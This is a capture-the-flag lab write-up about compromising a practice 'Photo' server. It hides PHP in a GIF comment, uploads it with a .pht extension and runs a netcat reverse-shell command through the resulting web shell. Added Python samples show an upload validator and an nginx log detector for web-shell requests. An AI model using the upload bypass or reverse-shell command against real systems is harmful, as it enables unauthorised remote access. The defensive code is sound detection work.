Pentestit.ru V.9 (Part 10) – Token Photo
So, another day, another tutorial. 😀
And this time we are going to focus our efforts on the “Photo” machine.
As usual we start with an nmap scan from our “ssh server” shell, and we see two open ports: SSH and HTTP.
$ nmap 192.168.0.6 -sV
Starting Nmap 6.00 ( http://nmap.org ) at 2016-08-03 16:17 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
80/tcp open  http    nginx 1.10.0
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
So we start with the most obvious thing and try the username/password combinations we have gathered so far over SSH. It turns out that did not work.
So we need to search and dig into the HTTP page.
Accessing it we encounter the following page:
Searching for “url title PTT” (because of the “PTT” in the title of the page)
we find the page https://packagist.org/packages/crowd/ptt
It seems this is a CMS created by crowd. We analyze the CMS and look for information about it, but nothing useful comes to our attention, so we start testing the upload feature. We try different file types (.txt, .doc, .py, .sh, .html) until we find out that only image files are accepted.
So if this page only accepts images, maybe we can upload a PHP reverse shell, using Tamper Data to pass the shell while making the server think it is an image. Let’s try that:
The result was:
So it seems the image was uploaded, but then the server probably ran a function to analyze it, identified that it was not an image after all, and deleted it. So it seems we really need an image file…
We turn to our old friend Google to look for ways to insert PHP code into an image, and it turns out that apparently we can add code to the “comments” metadata section of an image and then invoke it via the browser. So let’s try that:
We then saved that image and uploaded it to our “photo server”. (The tool used to add the comment was GIMP 2.)
The image uploaded successfully:
So now let’s try to invoke it:
This only shows our image.
So it seems it was uploaded successfully, but for some reason our PHP code was not being handled. This is where the secret was… the image extension had to be .pht (that was found by sneaking a peek at the write-up). With this in mind, we changed the .gif to .pht and uploaded it.
The upload was successful (also):
When we tested it, we got something… 😀
Voila!!! It worked, so now we can run commands on the photo server.
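From the defender’s side, the two things that made this work were an upload check that looked only at the image header (so a GIF with PHP in its Comment Extension passed) and a web server that handed .pht files to the PHP interpreter. Below is an added example of an upload validator that would have refused both files; it is not the PTT CMS code and the names (MAGIC, check_upload, gif_with_comment) are this example’s own. The GIF builder exists only to produce a constructed test input.

```python
"""Hardened image-upload check (added example, not the PTT CMS code).

Three independent checks, each of which would have rejected the files above:
  1. extension allowlist, so welcome4.pht is refused before anything else;
  2. magic-byte check, so a bare PHP file renamed to .gif is refused;
  3. scan of the whole file for PHP open tags, which catches code hidden in a
     GIF Comment Extension or in a JPEG COM/EXIF segment.
All names here are assumptions made for this example.
"""
import os
import re
from typing import Tuple

# Allowed extensions and the magic bytes each must start with
# (assumption: the gallery only needs GIF, PNG and JPEG).
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Long and short PHP open tags; case-insensitive because PHP accepts <?PHP.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason); stop at the first failing check."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match claimed image type"
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def gif_with_comment(comment: bytes) -> bytes:
    """Build a minimal 1x1 GIF89a carrying a Comment Extension (constructed test input).

    Header + logical screen descriptor, then the comment block
    (0x21 0xFE, one sub-block of up to 255 bytes, 0x00 terminator),
    then an image descriptor, a tiny LZW data block and the 0x3B trailer.
    """
    if len(comment) > 255:
        raise ValueError("single sub-block comment only in this helper")
    header = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00\x00\x00"
    comment_block = b"\x21\xfe" + bytes([len(comment)]) + comment + b"\x00"
    image = b"\x2c" + b"\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    image += b"\x02" + b"\x02\x44\x01" + b"\x00" + b"\x3b"
    return header + comment_block + image


if __name__ == "__main__":
    # Constructed samples mirroring the write-up: a .pht upload, a GIF whose
    # comment carries a PHP tag, a renamed PHP file, and a clean GIF.
    samples = [
        ("welcome4.pht", gif_with_comment(b"holiday 2016")),
        ("welcome4.gif", gif_with_comment(b"<?php /* constructed marker */ ?>")),
        ("shell.gif", b"<?php /* constructed marker */ ?>"),
        ("welcome4.gif", gif_with_comment(b"holiday 2016")),
    ]
    for name, blob in samples:
        print(name, check_upload(name, blob))
```

The tag scan is a cheap tripwire, not a complete control: an uploader can obfuscate or re-encode what sits in the metadata, so a gallery should also re-encode every accepted image (which drops the comment block entirely) and store uploads under a path the web server never routes to PHP. The .pht lesson is really an nginx/php-fpm routing issue: a `location` that forwards every `.ph*` suffix to the interpreter, combined with a writable `/upload/` directory, turns any accepted file into code.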
We did some enumeration and found that “nc” is available there. So we just need to set up a listener and invoke the image with the following parameters:
192.168.0.6/upload/welcome4.pht?cmd=nc -nv 172.16.0.2 25432 -e /bin/bash
And there it was… our shell \o/
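Requests like the one above leave a clear trace in the nginx access log: a GET for a file under /upload/ with a server-side extension, and then the same path with a command-style query parameter. The following is an added detection example (not part of the write-up) that flags those two signals in combined-format log lines; the log lines, the EXEC_EXT list and the SHELL_PARAMS set are constructed assumptions for this example.

```python
"""Flag web-shell style requests against an upload directory in nginx access logs.

Added example, not from the lab. Two signals, either of which is enough:
  * a path under /upload/ that ends in a server-side extension (.php, .pht, ...);
  * a query string carrying a shell-style parameter such as cmd=.
Log lines, extension list and parameter names are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# nginx combined format prefix: client, ident, user, [time], "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

UPLOAD_PREFIX = "/upload/"
EXEC_EXT = (".php", ".pht", ".phtml", ".phar")     # assumption: what php-fpm would run
SHELL_PARAMS = {"cmd", "exec", "command", "c"}   # assumption: common web-shell parameter names

# Constructed log lines mirroring the sequence in the write-up (addresses are the lab's).
CONSTRUCTED_LOG = """\
172.16.0.2 - - [03/Aug/2016:16:40:01 +0300] "GET /upload/welcome4.gif HTTP/1.1" 200 1234
172.16.0.2 - - [03/Aug/2016:16:45:12 +0300] "GET /upload/welcome4.pht HTTP/1.1" 200 812
172.16.0.2 - - [03/Aug/2016:16:47:30 +0300] "GET /upload/welcome4.pht?cmd=id HTTP/1.1" 200 90
192.168.0.50 - - [03/Aug/2016:16:48:00 +0300] "POST /upload HTTP/1.1" 302 0
"""


def suspicious(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    path = parts.path.lower()
    if not path.startswith(UPLOAD_PREFIX):
        return None
    reasons = []
    if path.endswith(EXEC_EXT):
        reasons.append("executable extension under " + UPLOAD_PREFIX)
    hit = SHELL_PARAMS & set(parse_qs(parts.query))
    if hit:
        reasons.append("shell-style parameter: " + ",".join(sorted(hit)))
    if not reasons:
        return None
    return {"src": src, "time": ts, "method": method, "target": target,
            "status": status, "reasons": reasons}


def scan(log_text: str):
    """Run suspicious() over every line and keep the findings, in log order."""
    return [f for f in (suspicious(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(CONSTRUCTED_LOG):
        print(finding["time"], finding["src"], finding["target"], "->", "; ".join(finding["reasons"]))
```

The first signal fires on the very first fetch of welcome4.pht, before any command is sent, which is the alert worth paging on: a file with an executable suffix being served from a directory that should only ever hold images. Real traffic will URL-encode the spaces in the query, so the parser keys on parameter names rather than on the command text.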
Now we just needed to go to our token and see its contents:
ls
Xiz9soo4qua  welcome4.pht
cd Xiz9soo4qua
ls
photo.txt
cat photo.txt
e*****h***t